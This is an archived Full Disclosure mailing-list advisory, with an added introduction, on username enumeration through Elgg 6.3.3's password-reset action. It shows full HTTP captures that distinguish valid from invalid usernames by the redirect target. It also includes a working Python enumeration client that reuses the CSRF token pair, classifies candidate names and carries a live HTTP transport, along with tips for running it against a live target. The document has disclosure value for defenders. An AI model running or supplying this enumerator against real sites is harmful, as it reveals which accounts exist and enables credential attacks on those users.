Username Enumeration - elggv6.3.3
Elgg 6.3.3 allows username enumeration through the password reset function. A reset request for a valid username is answered with a 302 redirect to the site home page and a "Successfully requested a new password, email sent" message; a request for an unknown username is redirected back to /forgotpassword with a "Username x not found." error. The Location header of the first response is already enough to tell the two cases apart, so an attacker does not need to follow the redirect. Both submissions carry the session's __elgg_token and __elgg_ts action-token pair, and the captures below show the same pair accepted for both the valid and the invalid username.

Full Disclosure mailing list archives


From: Andrey Stoykov <mwebsec () gmail com>
Date: Sat, 24 Jan 2026 18:04:50 +0000

# Exploit Title: Elgg - Username Enumeration
# Date: 1/2026
# Exploit Author: Andrey Stoykov
# Version: 6.3.3
# Tested on: Ubuntu 22.04
# Blog: https://msecureltd.blogspot.com/2026/01/friday-fun-pentest-series-47-lack-of.html

// HTTP Request - Resetting Password - Valid User

POST /action/user/requestnewpassword HTTP/1.1
Host: elgg.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
Origin: http://elgg.local
Sec-GPC: 1
Connection: keep-alive
Referer: http://elgg.local/forgotpassword
Cookie: Elgg=3v9mqlh8vai2f9hemfo7iqttt6
Upgrade-Insecure-Requests: 1
Priority: u=0, i

__elgg_token=2Cpt0GyVW9swhLkm5PggkQ&__elgg_ts=1769264047&username=admin

// HTTP Response - Resetting Password - Valid User

HTTP/1.1 302 Found
Date: Sat, 24 Jan 2026 14:14:43 GMT
Server: Apache/2.4.52 (Ubuntu)
Cache-Control: must-revalidate, no-cache, no-store, private
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
Location: http://elgg.local/
Vary: User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 318

<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8" />
        <meta http-equiv="refresh" content="0;url='http://elgg.local/'" />

        <title>Redirecting to http://elgg.local/</title>
    </head>
    <body>
        Redirecting to <a href="http://elgg.local/">http://elgg.local/</a>.
    </body>
</html>

// HTTP Request - Following Redirection - Valid User

GET / HTTP/1.1
Host: elgg.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://elgg.local
Sec-GPC: 1
Connection: keep-alive
Referer: http://elgg.local/action/user/requestnewpassword
Cookie: Elgg=3v9mqlh8vai2f9hemfo7iqttt6
Upgrade-Insecure-Requests: 1
Priority: u=0, i

// HTTP Response - Following Redirection - Valid User

HTTP/1.1 200 OK
Date: Sat, 24 Jan 2026 14:14:46 GMT
Server: Apache/2.4.52 (Ubuntu)
Cache-Control: must-revalidate, no-cache, no-store, private
x-frame-options: SAMEORIGIN
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
x-content-type-options: nosniff
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 20646

[...]
<div class="elgg-message elgg-message-success"><div class="elgg-inner"><div class="elgg-body">Successfully requested a new password, email sent</div></div></div>
[...]

// HTTP Request - Resetting Password - Invalid User

POST /action/user/requestnewpassword HTTP/1.1
Host: elgg.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Origin: http://elgg.local
Sec-GPC: 1
Connection: keep-alive
Referer: http://elgg.local/forgotpassword
Cookie: Elgg=3v9mqlh8vai2f9hemfo7iqttt6
Upgrade-Insecure-Requests: 1
Priority: u=0, i

__elgg_token=2Cpt0GyVW9swhLkm5PggkQ&__elgg_ts=1769264047&username=x


// HTTP Response - Resetting Password - Invalid User

HTTP/1.1 302 Found
Date: Sat, 24 Jan 2026 14:15:07 GMT
Server: Apache/2.4.52 (Ubuntu)
Cache-Control: must-revalidate, no-cache, no-store, private
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
Location: http://elgg.local/forgotpassword
Vary: User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 374

<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8" />
        <meta http-equiv="refresh" content="0;url='http://elgg.local/forgotpassword'" />

        <title>Redirecting to http://elgg.local/forgotpassword</title>
    </head>
    <body>
        Redirecting to <a href="http://elgg.local/forgotpassword">http://elgg.local/forgotpassword</a>.
    </body>
</html>

// HTTP Request - Following Redirection - Invalid User

GET /forgotpassword HTTP/1.1
Host: elgg.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://elgg.local
Sec-GPC: 1
Connection: keep-alive
Referer: http://elgg.local/action/user/requestnewpassword
Cookie: Elgg=3v9mqlh8vai2f9hemfo7iqttt6
Upgrade-Insecure-Requests: 1
Priority: u=0, i

// HTTP Response - Following Redirection - Invalid User

HTTP/1.1 200 OK
Date: Sat, 24 Jan 2026 14:15:09 GMT
Server: Apache/2.4.52 (Ubuntu)
Cache-Control: must-revalidate, no-cache, no-store, private
x-frame-options: SAMEORIGIN
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
x-content-type-options: nosniff
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 19681

[...]
<div class="elgg-message elgg-message-error"><div class="elgg-inner"><div class="elgg-body">Username x not found.</div></div></div>
[...]
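The captures above give a two-state oracle: a 302 to the home page for an existing username, a 302 back to /forgotpassword for an unknown one. The script below, an added example that is not part of the original post and not Elgg project code, turns that into a small enumeration client. It fetches the forgot-password form once for the __elgg_token/__elgg_ts pair, submits each candidate username to /action/user/requestnewpassword and classifies the answer from the Location header without following the redirect. Two things are assumptions rather than facts from the post: that the form page exposes the two token values as hidden input fields, and that one token pair can be reused for several submissions in the same session (the post reuses a single pair). The transport is injectable, so the logic runs offline against a constructed stand-in server that replays the post's responses; http_transport() is the plain-HTTP variant for a lab target.

```python
"""Username enumeration via the Elgg password-reset action (added example).

    valid user   -> 302, Location: http://elgg.local/               (success flash)
    invalid user -> 302, Location: http://elgg.local/forgotpassword (error flash)

Assumed, not taken from the post: hidden <input> fields carry __elgg_token and
__elgg_ts on /forgotpassword, and one token pair is reusable within a session.
"""
import http.client
import re
from dataclasses import dataclass
from typing import Callable, Dict, Iterable, Optional
from urllib.parse import parse_qs, urlencode, urlparse


@dataclass
class Response:
    status: int
    headers: Dict[str, str]
    body: str


# (method, path, headers, body) -> Response; injectable so tests run offline.
Transport = Callable[[str, str, Dict[str, str], Optional[str]], Response]

ACTION = "/action/user/requestnewpassword"
FORM_PAGE = "/forgotpassword"


def extract_tokens(html: str) -> Dict[str, str]:
    """Read the action-token pair from hidden inputs (assumed form markup)."""
    tokens = {}
    for name in ("__elgg_token", "__elgg_ts"):
        m = re.search(r'name="%s"[^>]*\bvalue="([^"]+)"' % name, html)
        if m is None:
            raise ValueError("%s not found in %s" % (name, FORM_PAGE))
        tokens[name] = m.group(1)
    return tokens


def classify(resp: Response) -> str:
    """'valid', 'invalid' or 'unknown', decided from the redirect target alone."""
    headers = {k.lower(): v for k, v in resp.headers.items()}
    location = headers.get("location")
    if resp.status != 302 or not location:
        return "unknown"
    path = urlparse(location).path.rstrip("/") or "/"
    if path == "/":
        return "valid"
    if path == FORM_PAGE:
        return "invalid"
    return "unknown"


def check_username(transport: Transport, host: str, username: str,
                   tokens: Dict[str, str], cookie: str) -> str:
    """Submit one reset request and classify it; the redirect is not followed."""
    body = urlencode({**tokens, "username": username})
    headers = {"Host": host,
               "Content-Type": "application/x-www-form-urlencoded",
               "Referer": "http://%s%s" % (host, FORM_PAGE),
               "Cookie": cookie}
    return classify(transport("POST", ACTION, headers, body))


def enumerate_usernames(transport: Transport, host: str,
                        candidates: Iterable[str], cookie: str) -> Dict[str, str]:
    """Fetch the form once for a token pair, then test every candidate."""
    page = transport("GET", FORM_PAGE, {"Host": host, "Cookie": cookie}, None)
    tokens = extract_tokens(page.body)
    return {u: check_username(transport, host, u, tokens, cookie) for u in candidates}


def http_transport(host: str, timeout: float = 10.0) -> Transport:
    """Plain-HTTP transport matching the post's http://elgg.local lab setup."""
    def send(method, path, headers, body):
        conn = http.client.HTTPConnection(host, timeout=timeout)
        conn.request(method, path, body=body, headers=headers)
        raw = conn.getresponse()
        resp = Response(raw.status, dict(raw.getheaders()),
                        raw.read().decode("utf-8", "replace"))
        conn.close()
        return resp
    return send


# Constructed stand-in for the lab server, replaying the responses in the post.
FAKE_FORM = ('<form action="http://elgg.local%s" method="post">'
             '<input type="hidden" name="__elgg_token" value="2Cpt0GyVW9swhLkm5PggkQ" />'
             '<input type="hidden" name="__elgg_ts" value="1769264047" />'
             '<input type="text" name="username" /></form>' % ACTION)
FAKE_USERS = {"admin"}


def fake_transport(method, path, headers, body):
    if method == "GET" and path == FORM_PAGE:
        return Response(200, {"Content-Type": "text/html; charset=utf-8"}, FAKE_FORM)
    if method == "POST" and path == ACTION:
        username = parse_qs(body or "").get("username", [""])[0]
        target = "/" if username in FAKE_USERS else FORM_PAGE
        return Response(302, {"Location": "http://elgg.local" + target}, "")
    return Response(404, {}, "")


if __name__ == "__main__":
    found = enumerate_usernames(fake_transport, "elgg.local", ["admin", "x"],
                                "Elgg=3v9mqlh8vai2f9hemfo7iqttt6")
    for user, verdict in found.items():
        print("%-10s %s" % (user, verdict))
```

The flash messages in the followed-redirect responses are a second signal, but the Location header already separates the two cases with one request per candidate, which is why classify() never follows the redirect. If a live target starts answering "unknown" for every name, the token pair has most likely stopped being accepted; refetch /forgotpassword and continue with the new pair.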
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


Source: https://seclists.org/fulldisclosure/2026/Jan/30